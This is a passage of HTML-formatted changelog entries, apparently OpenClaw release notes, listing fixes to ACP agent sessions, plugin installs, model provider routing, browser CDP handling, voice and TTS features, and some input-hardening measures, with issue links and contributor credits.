<li>ACP/sessions_spawn: reject normal OpenClaw config agent ids when callers explicitly request <code>runtime="acp"</code>, while allowing agents configured with <code>runtime.type="acp"</code> to resolve to their ACP harness id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234724919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63914" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63914/hovercard" href="https://github.com/openclaw/openclaw/issues/63914">#63914</a>.</li>
<li>ACP/sessions_spawn: apply <code>runTimeoutSeconds</code> to ACP child turns and dispatch those turns on the background subagent lane, so quota-stalled ACP harnesses do not occupy the main agent lane indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289936854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68823/hovercard" href="https://github.com/openclaw/openclaw/issues/68823">#68823</a>.</li>
<li>ACP/oneshot: reconcile runtime session identity before closing completed oneshot ACP runs, so finished <code>sessions.json</code> entries do not stay stuck with <code>acp.identity.state="pending"</code>.</li>
<li>ACPX: bundle <code>acpx@0.6.1</code> so unsupported generic model overrides fail clearly instead of silently falling back to the target adapter default.</li>
<li>ACP/models: document that non-Codex ACP model overrides require adapter support for ACP <code>models</code> plus <code>session/set_model</code>, so unsupported harnesses fail clearly instead of silently falling back to their defaults.</li>
<li>Plugins/Voice Call: treat missing provider credentials as setup-incomplete during Gateway startup and log the missing keys as a warning instead of a runtime startup error, while keeping explicit command/tool errors when used.</li>
<li>Android/Talk Mode: prevent duplicate TTS playback when fast or repeated final chat events arrive while Talk Mode is waiting for its own response. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076624751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46546/hovercard" href="https://github.com/openclaw/openclaw/issues/46546">#46546</a>.</li>
<li>Tooling/check:changed: pass parent heavy-check lock markers to lint lanes so <code>pnpm check:changed</code> no longer waits on its own <code>lint:extensions</code> child.</li>
<li>CLI/completion: dedupe provider auth flags before registering <code>openclaw onboard</code> options, so completion-cache refresh during update no longer fails when stale core fallback flags overlap plugin manifest flags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328717666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71667/hovercard" href="https://github.com/openclaw/openclaw/issues/71667">#71667</a>.</li>
<li>Diagnostics/trace: report live context usage from the current prompt snapshot instead of provider turn totals, avoiding false near-full context spikes on cached or tool-heavy runs.</li>
<li>Providers/Google: honor <code>models.providers.google.request.allowPrivateNetwork</code> for Gemini TTS and telephony TTS, matching Google image generation and media understanding. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329016945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71723/hovercard" href="https://github.com/openclaw/openclaw/pull/71723">#71723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ro-hansolo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ro-hansolo">@ro-hansolo</a>.</li>
<li>Providers/MiniMax: register <code>minimax-portal</code> for music and video generation, preserving OAuth auth and regional MiniMax base URLs across the shared <code>music_generate</code> and <code>video_generate</code> tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226014254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63241/hovercard" href="https://github.com/openclaw/openclaw/pull/63241">#63241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tars90percent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tars90percent">@tars90percent</a>.</li>
<li>Providers/onboarding: keep Runway and Alibaba Model Studio out of the text-inference setup picker by scoping their video-generation auth choices to the media setup flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253432057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65856/hovercard" href="https://github.com/openclaw/openclaw/pull/65856">#65856</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/Bonjour: stop the gateway from crash-looping on <code>CIAO PROBING CANCELLED</code> when the mDNS watchdog cancels a stuck probe. Restores the rejection-handler wiring dropped during the bonjour plugin migration and shares unhandled-rejection state across module instances so plugin-staged copies of <code>openclaw/plugin-sdk/runtime</code> register into the same handler set the host consults. Especially affects Docker on macOS, where mDNS probing reliably hits the watchdog. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/troyhitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/troyhitch">@troyhitch</a>.</li>
<li>Google Meet: report pinned Chrome nodes as offline or missing capabilities in setup/join diagnostics, keep inaccessible nodes out of auto-selection, and preflight local BlackHole/SoX requirements before agents try local Chrome.</li>
<li>Providers/MiniMax: route <code>image-01</code> requests to the dedicated image generation endpoint while preserving CN endpoint selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206267950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61149/hovercard" href="https://github.com/openclaw/openclaw/issues/61149">#61149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Plugins/startup: remove ownerless bundled runtime-dependency install locks after a short grace window and include lock owner details when startup times out waiting for a plugin runtime-deps lock.</li>
<li>Plugins/install: anchor bundled runtime-dependency npm installs with an OpenClaw-owned package manifest so Linux updates cannot accidentally write to a parent <code>$HOME/node_modules</code> tree. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>Plugins/install: pass onboarding plugin config into plugin index writes so local plugin installs outside default discovery roots keep their install records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: migrate shipped <code>plugins.installs</code> config records into the plugin index while stripping them from runtime config and future writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: durably remove shipped <code>plugins.installs</code> from <code>openclaw.json</code> after its records are copied into the plugin index, while rolling back the index write if config cleanup fails. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: keep migrated plugin install records in the plugin index even when the plugin manifest is missing or invalid, so update, uninstall, inspect, and audit can still recover broken installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/security: keep plugin audit JSON check ids stable while reporting plugin index install-record findings with updated wording. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/config: reject direct <code>plugins.installs</code> edits with guidance to use <code>openclaw plugins install</code>, <code>openclaw plugins update</code>, or <code>openclaw plugins uninstall</code> instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Live tests/voice: accept common STT variants for OpenClaw and ElevenLabs brand names so provider smoke tests fail on real regressions rather than equivalent transcripts.</li>
<li>Agents/replies: forward sanitized underlying agent failure details on external channels instead of replacing unknown failures with a generic retry message.</li>
<li>CLI/MCP: translate OpenClaw <code>mcp.servers.*.transport</code> entries into Claude/Gemini CLI <code>type</code> fields so streamable HTTP MCP servers load in CLI backend sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329018159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71724/hovercard" href="https://github.com/openclaw/openclaw/pull/71724">#71724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blockchain-Oracle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blockchain-Oracle">@Blockchain-Oracle</a>.</li>
<li>Browser/CDP: honor configured remote and <code>attachOnly</code> CDP HTTP/WebSocket timeouts when opening tabs through raw CDP or <code>/json/new</code> fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132440350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54238/hovercard" href="https://github.com/openclaw/openclaw/pull/54238">#54238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuncWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuncWei">@FuncWei</a>.</li>
<li>WhatsApp/TTS: send visible text separately from PTT voice-note audio instead of relying on hidden voice-note captions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108175128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51081/hovercard" href="https://github.com/openclaw/openclaw/issues/51081">#51081</a>.</li>
<li>Browser/client: avoid telling agents to restart OpenClaw for dispatcher timeouts on external browser profiles such as <code>attachOnly</code>, remote CDP, and existing-session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044411472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40815/hovercard" href="https://github.com/openclaw/openclaw/pull/40815">#40815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsline">@0xsline</a>.</li>
<li>Agents/TTS: preserve <code>[[audio_as_voice]]</code> directives on trusted text tool-result <code>MEDIA:</code> payloads so generated audio still delivers as a voice note. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076576982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46535/hovercard" href="https://github.com/openclaw/openclaw/pull/46535">#46535</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/azade-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/azade-c">@azade-c</a>.</li>
<li>Agents/TTS: keep queued tool media when an assistant ends with <code>NO_REPLY</code> on non-block delivery paths, so media-only generated audio replies still send. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198016737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60025/hovercard" href="https://github.com/openclaw/openclaw/pull/60025">#60025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlind1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlind1">@bradlind1</a>.</li>
<li>Telegram/STT: frame inbound voice-note transcripts as machine-generated, untrusted text in agent context while preserving raw transcript mention detection. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018090172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33360/hovercard" href="https://github.com/openclaw/openclaw/issues/33360">#33360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smartchainark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smartchainark">@smartchainark</a>.</li>
<li>Subagents/browser: show an actionable <code>/tools</code> notice when browser automation is configured but filtered out by the active tool profile, and document that coding-profile agents should use <code>tools.alsoAllow: ["browser"]</code> rather than subagent allowlists alone.</li>
<li>Control UI/Quick Settings: persist the assistant avatar override to browser local storage (mirroring the user avatar) so uploaded image data URLs no longer fail config validation with "Too big: expected string to have &lt;=200 characters". Also lift the gateway-side <code>ui.assistant.avatar</code> length cap to match the user avatar size budget for non-UI clients writing the field directly. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugin SDK: share diagnostic event subscriptions across duplicate source/dist module graphs so legacy root SDK imports still receive runtime diagnostic events.</li>
<li>Agents/Bedrock: prevent empty assistant stream-error turns from poisoning Converse replay by persisting, repairing, and replaying a non-empty fallback block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328056829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71572" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71572/hovercard" href="https://github.com/openclaw/openclaw/issues/71572">#71572</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328448230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71627/hovercard" href="https://github.com/openclaw/openclaw/pull/71627">#71627</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Agents/Anthropic/Bedrock: strip thinking blocks with missing, empty, or blank replay signatures before provider conversion, falling back to non-empty omitted-reasoning text when needed so corrupted signed-thinking history no longer poisons subsequent turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070310932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45010/hovercard" href="https://github.com/openclaw/openclaw/issues/45010">#45010</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307495974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70054/hovercard" href="https://github.com/openclaw/openclaw/pull/70054">#70054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/castaples/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/castaples">@castaples</a>.</li>
<li>Agents/Anthropic/Bedrock: preserve stripped thinking-only assistant replay turns with non-empty omitted-reasoning text so provider adapters keep strict user/assistant turn shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>ACP/Codex: pass <code>sessions_spawn(runtime="acp")</code> model and thinking overrides into Codex ACP startup, normalize <code>openai-codex/*</code> refs and slash reasoning suffixes, and recognize managed Codex ACP wrapper commands without blocking current <code>gpt-5.5</code> sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042597081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40393" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40393/hovercard" href="https://github.com/openclaw/openclaw/issues/40393">#40393</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328579948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71643" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71643/hovercard" href="https://github.com/openclaw/openclaw/pull/71643">#71643</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Browser/CDP: make readiness diagnostics use the same discovery-first fallback as reachability for bare <code>ws://</code> Browserless and Browserbase CDP URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299797320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69532/hovercard" href="https://github.com/openclaw/openclaw/issues/69532">#69532</a>.</li>
<li>Browser/CDP: explain that loopback Browserless or other externally managed CDP services need <code>attachOnly: true</code> and matching Browserless <code>EXTERNAL</code> endpoint when reporting local port ownership conflicts, and fall back to the configured bare WebSocket root when a discovered Browserless endpoint rejects CDP. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095070385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49815/hovercard" href="https://github.com/openclaw/openclaw/issues/49815">#49815</a>.</li>
<li>Gateway/reload: preserve indefinite <code>gateway.reload.deferralTimeoutMs: 0</code> semantics for channel hot reload deferrals so active agent runs are not interrupted by a forced channel restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>Agents/tool results: cap persisted Pi tool-result details and strip hidden diagnostics before provider conversion, preventing large debug payloads from bloating session transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>ACP/OpenCode: update the bundled acpx runtime to 0.6.0 and cover the OpenCode ACP bind path in Docker live tests.</li>
<li>Providers/OpenCode Go: add DeepSeek V4 Pro and DeepSeek V4 Flash to the Go catalog while the bundled Pi registry catches up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328161792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71587/hovercard" href="https://github.com/openclaw/openclaw/issues/71587">#71587</a>.</li>
<li>Providers/OpenCode Go: route DeepSeek V4 Pro/Flash through the OpenAI-compatible Go endpoint and suppress invalid <code>reasoning_effort: "off"</code> payloads, fixing tool-enabled requests for <code>opencode-go/deepseek-v4-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328769808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71683/hovercard" href="https://github.com/openclaw/openclaw/issues/71683">#71683</a>.</li>
<li>Plugins/model defaults: run Skill Workshop review, Active Memory recall, and session-memory slug generation on the configured agent default model instead of the hardcoded OpenAI SDK fallback when hook context lacks model metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328679241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71659" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71659/hovercard" href="https://github.com/openclaw/openclaw/issues/71659">#71659</a>.</li>
<li>Providers/Venice: fill the required DeepSeek V4 <code>reasoning_content</code> placeholder for <code>venice/deepseek-v4-pro</code> and <code>venice/deepseek-v4-flash</code> replay turns without sending native DeepSeek <code>thinking</code> controls that Venice rejects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328450187" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71628/hovercard" href="https://github.com/openclaw/openclaw/issues/71628">#71628</a>.</li>
<li>Browser/existing-session: support per-profile Chrome MCP command/args, map <code>cdpUrl</code> to <code>--browserUrl</code> or <code>--wsEndpoint</code>, and avoid combining endpoint flags with <code>--userDataDir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080120284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47879/hovercard" href="https://github.com/openclaw/openclaw/issues/47879">#47879</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080995803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48037/hovercard" href="https://github.com/openclaw/openclaw/issues/48037">#48037</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220547110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62706/hovercard" href="https://github.com/openclaw/openclaw/issues/62706">#62706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/puneet1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/puneet1409">@puneet1409</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhehao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhehao">@zhehao</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madkow1001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madkow1001">@madkow1001</a>.</li>
<li>Media/plugins: bound MIME sniffing and ZIP archive preflight before handing untrusted files to <code>file-type</code> or <code>jszip</code>, reducing parser CPU and memory exposure for attachments and ClawHub plugin archives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Memory-host SDK: use trusted env-proxy mode for remote embedding and batch HTTP calls only when Undici will proxy that target, preserving SSRF DNS pinning for <code>ALL_PROXY</code>-only and <code>NO_PROXY</code> bypass cases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115438877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52162/hovercard" href="https://github.com/openclaw/openclaw/issues/52162">#52162</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327688904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71506/hovercard" href="https://github.com/openclaw/openclaw/pull/71506">#71506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Gateway/dashboard: render Control UI and WebSocket links with <code>https://</code>/<code>wss://</code> when <code>gateway.tls.enabled=true</code>, including <code>openclaw gateway status</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327630185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71494/hovercard" href="https://github.com/openclaw/openclaw/issues/71494">#71494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327660439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71499/hovercard" href="https://github.com/openclaw/openclaw/pull/71499">#71499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepkilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepkilo">@deepkilo</a>.</li>
<li>Agents/OpenAI-compatible: default proxy/local completions tool requests to <code>tool_choice: "auto"</code> when tools are present, so providers enter native tool-calling mode instead of replying with plain-text tool directives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327534098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71472/hovercard" href="https://github.com/openclaw/openclaw/pull/71472">#71472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Speed-maker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Speed-maker">@Speed-maker</a>.</li>
<li>OpenAI image generation: use <code>gpt-5.5</code> for the Codex OAuth responses transport instead of the retired <code>gpt-5.4</code> model, fixing 500s from ChatGPT Codex image generation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327703791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71513/hovercard" href="https://github.com/openclaw/openclaw/issues/71513">#71513</a>. Thanks @baolongl.</li>
<li>OpenAI image generation: route transparent-background default-model requests to <code>gpt-image-1.5</code>, document the expected <code>image_generate</code> call shape, and keep Azure/custom OpenAI-compatible deployment names untouched.</li>
<li>Google video generation: download direct MLDev Veo <code>video.uri</code> results instead of passing them through the Files API path, fixing 404s after successful generation/polling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324817492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71200" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71200/hovercard" href="https://github.com/openclaw/openclaw/issues/71200">#71200</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/panhaishan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/panhaishan">@panhaishan</a>.</li>
<li>Google video generation: fall back to the REST <code>predictLongRunning</code> Veo endpoint for text-only SDK 404s while keeping reference image/video generation on the SDK path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215587624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62309/hovercard" href="https://github.com/openclaw/openclaw/issues/62309">#62309</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222914272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63008/hovercard" href="https://github.com/openclaw/openclaw/issues/63008">#63008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216005545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62343/hovercard" href="https://github.com/openclaw/openclaw/pull/62343">#62343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leoleedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leoleedev">@leoleedev</a>.</li>
